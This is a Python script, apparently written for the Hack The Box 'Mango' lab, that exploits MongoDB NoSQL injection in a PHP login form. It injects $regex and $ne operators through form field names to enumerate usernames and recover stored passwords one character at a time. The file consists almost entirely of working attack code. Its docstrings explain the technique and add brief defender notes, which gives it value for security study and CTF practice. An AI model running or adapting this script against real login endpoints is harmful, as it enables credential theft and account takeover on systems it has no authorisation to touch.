| import string import requests
# Login endpoint under test; the Host header simply restates the vhost named in the URL.
url = "http://staging-order.mango.htb/index.php"
headers = {"Host": "staging-order.mango.htb"}

# Alphabet used for one-character-at-a-time regex probing. Letters and digits go
# in verbatim; every punctuation character is backslash-escaped so the injected
# pattern treats it literally rather than as a regex metacharacter.
possible_chars = [*string.ascii_letters, *string.digits]
possible_chars += ["\\" + ch for ch in string.punctuation]
def main():
    """Enumerate usernames via the login oracle, then recover each user's password.

    Prints one ``username:password`` line per account once enumeration finishes,
    or ``Not Found!`` when get_users() returns an empty list.
    """
    usernames = get_users()
    # NOTE(review): the listing arrived with its indentation collapsed; the
    # trailing `else` is read as the branch of this `if`, not as a for/else.
    if usernames:
        print('Finished!')
        for username in usernames:
            password = get_password(username)
            print('{}:{}'.format(username, password))
    else:
        print('Not Found!')
def get_users():
    """Reconstruct usernames one character at a time through a boolean oracle.

    The form field name ``username[$regex]`` smuggles a MongoDB ``$regex``
    operator into the login query (PHP decodes ``a[b]`` form keys into an
    array, and an array value passed straight into the query is interpreted
    as an operator document - presumably what the endpoint does; verify
    against the application). A 302 response is treated as "the pattern
    matched an account"; anything else as "no match".

    Returns:
        list[str]: every username recovered, without the leading ``^`` anchor.

    Caveats visible in the code:
    - ``^c.*`` matches any account starting with ``c``, and the inner walk
      follows the first matching continuation, so at most one username per
      initial character is recovered.
    - get_username_length() is not tied to a specific account, so the inner
      loop runs for the longest username's length; for shorter names the
      extra rounds simply find no matching character.

    Defender notes: the server-side fix is to reject or stringify array-valued
    form fields before they reach the query; in access logs this enumeration
    shows up as many POSTs to the same path with ``[$`` in a form field name.
    """
    usernames = []
    # password[$regex]=.* matches any stored password, so only the username
    # pattern decides whether the login succeeds.
    payload = {"username[$regex]":"","password[$regex]":".*", "login":"login"}
    for c in possible_chars:
        # Anchored prefix pattern: ^c.* - does any username start with c?
        username = "^" + c
        payload["username[$regex]"] = username + ".*"
        r = requests.post(url, data=payload, headers=headers, allow_redirects=False)
        if r.status_code == 302:
            print("username start with character:" + c)
            # One round per remaining character; the length probe is evaluated
            # once here, not once per candidate.
            for x in range(0, get_username_length() - 1):
                for c2 in possible_chars:
                    payload["username[$regex]"] = username + c2 + ".*"
                    r2 = requests.post(url, data=payload, headers=headers, allow_redirects=False)
                    if r2.status_code == 302:
                        # Commit the character and move on to the next position.
                        username += c2
                        print(username[1:])
                        break
            # Strip the ^ anchor before reporting/storing the name.
            print("Found username: {}".format(username[1:]))
            usernames.append(username[1:])
    return usernames
def get_password(username):
    """Recover the stored password string for ``username`` character by character.

    The username is sent as a plain string; only ``password[$regex]`` carries
    an injected operator. For each position every candidate in possible_chars
    is tried as ``^<known so far><candidate>.*`` and a 302 response is taken
    as a match.

    Args:
        username: account name as returned by get_users().

    Returns:
        str: the recovered value with the ``^`` anchor and the regex escape
        backslashes removed. Note this is whatever string sits in the stored
        password field - the probe only reveals a usable credential when that
        field holds the password unhashed.
    """
    payload = {"username": username, "password[$regex]": "", "login": "login"}
    password = "^"
    # get_pass_length() is evaluated once when the range is built.
    for x in range(0, get_pass_length(username)):
        for c in possible_chars:
            payload["password[$regex]"] = password + c + ".*"
            r = requests.post(url, data=payload, headers=headers, allow_redirects=False)
            if r.status_code == 302:
                password += c
                print(password[1:])
                break
    # Drop the anchor and undo the backslash escaping applied in possible_chars.
    password = password[1:].replace("\\", "")
    print("Found {}'s password: ".format(username) + password)
    return password
def get_username_length():
    """Probe the length of the longest username via ``.{N}`` patterns.

    Sends ``username[$regex]=.{N}`` for N = 1, 2, ... until the login stops
    returning 302. Because no account is fixed and ``.{N}`` is unanchored,
    a 302 means *some* account has a username of at least N characters, so
    the value returned is the longest username's length, not a specific
    user's. ``password[$ne]=""`` matches any non-empty stored password.

    Returns:
        int: the largest N for which the probe still matched.
    """
    length = 1
    while True:
        # The doubled braces are str.format escapes; the rendered regex is `.{N}`.
        payload = {"username[$regex]": ".{{{}}}".format(length), "password[$ne]":"", "login":"login"}
        r = requests.post(url, data=payload, headers=headers, allow_redirects=False)
        if r.status_code == 302:
            length += 1
        else:
            # First N that fails to match: the previous one was the maximum.
            return length -1
def get_pass_length(username):
    """Probe the length of the stored password string for one account.

    Same ``.{N}`` technique as get_username_length(), but the username is
    fixed so the match is specific to this account.

    Args:
        username: account name as returned by get_users().

    Returns:
        int: the largest N for which ``password[$regex]=.{N}`` still produced
        a 302 response.
    """
    length = 1
    while True:
        # The doubled braces are str.format escapes; the rendered regex is `.{N}`.
        payload = {"username": username, "password[$regex]": ".{{{}}}".format(length), "login": "login"}
        r = requests.post(url, data=payload, headers=headers, allow_redirects=False)
        if r.status_code == 302:
            length += 1
        else:
            # First N that fails to match: the previous one was the maximum.
            return length -1
# Script entry point; importing the module does not start any requests.
if __name__ == '__main__':
    main()